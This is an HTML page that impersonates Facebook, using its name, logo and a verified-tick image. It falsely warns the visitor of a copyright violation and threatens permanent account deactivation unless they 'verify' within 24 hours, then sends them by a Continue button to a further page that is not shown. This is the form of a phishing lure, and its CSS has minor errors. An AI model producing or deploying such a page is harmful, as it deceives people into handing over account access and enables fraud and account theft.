<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&amp;display=swap" rel="stylesheet">
    <title>Facebook</title>
    <style>
        * {
            
        }

        #box {
            height: 40%;
            width: 45%;
            background-color: #77 748
            border-radius: 3px;
            display: flex;
            align-items: center;
            flex-direction: column;
        }

        #box>img {
            width: 70px;
            margin-top: 15px;
        }

        #data {
            display: flex;
            align-items: center;
            justify-content: center;
            margin-top: 15px;
        }

        #data>h4 {
            font-size: 25px;
        }

        #data>img {
            width: 25px;
        }

        .line {
            height: .7px;
            background-color: rgba(0, 0, 0, 0.222);
            width: 90%;
            margin: 1rem;
        }

        #para h2 {
            font-size: 16px;
        }

        #para {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        #para p {
            margin: 10px 100px 0px 100px;
            font-size: 14px;
        }

        #para button {
            padding: 10px 20px 10px 20px;
            margin-top: 25px;
            border: none;
            border-radius: 2px;
            font-size: 18px;
            background-color: #145dbd;
            cursor: pointer;
        }

        #para button a {
            text-decoration: none;
            color: #fff;
        }

        #para button:hover {
            background-color: #03469e;
        }




        @media (max-width: 500px) {

            #box {

                margin: 0;
                height: 45%;
                width: 95%;
                top: 0%;

            }

            #box>img {
                width: 40px;
            }

            #data>h4 {
                font-size: 18px;
            }

            #data>img {
                width: 15px;
                margin-left: 2px;
            }

            .line {
                height: .5px;
                width: 90%;
                margin-left: auto;
                margin-right: auto;
                background-color: #00000045;
            }

            
            }
        }
    </style>
</head>
<body>
    <div id="container">
        <div id="box">
            <img src="facebook-logo.png" alt="">
            <div id="data">
                <H4>Account will be deactivated</H4> <img src="bluetick1.png" alt="">
            </div>
            <div class="line"></div>
            <div id="para">
                <h2>
Your account or the page you use has violated copyright. We will immediately limit your account or permanently disable it for non-compliance with our terms of service.
If you think we've accidentally suspended your account, you have 24 hours to verify your account. If you miss this security notification, your account will be permanently disabled. </p>
                <button> <a href="index1.html"> Continue</a> </button>
            </div>
        </div>
    </div>
</body>

</html>
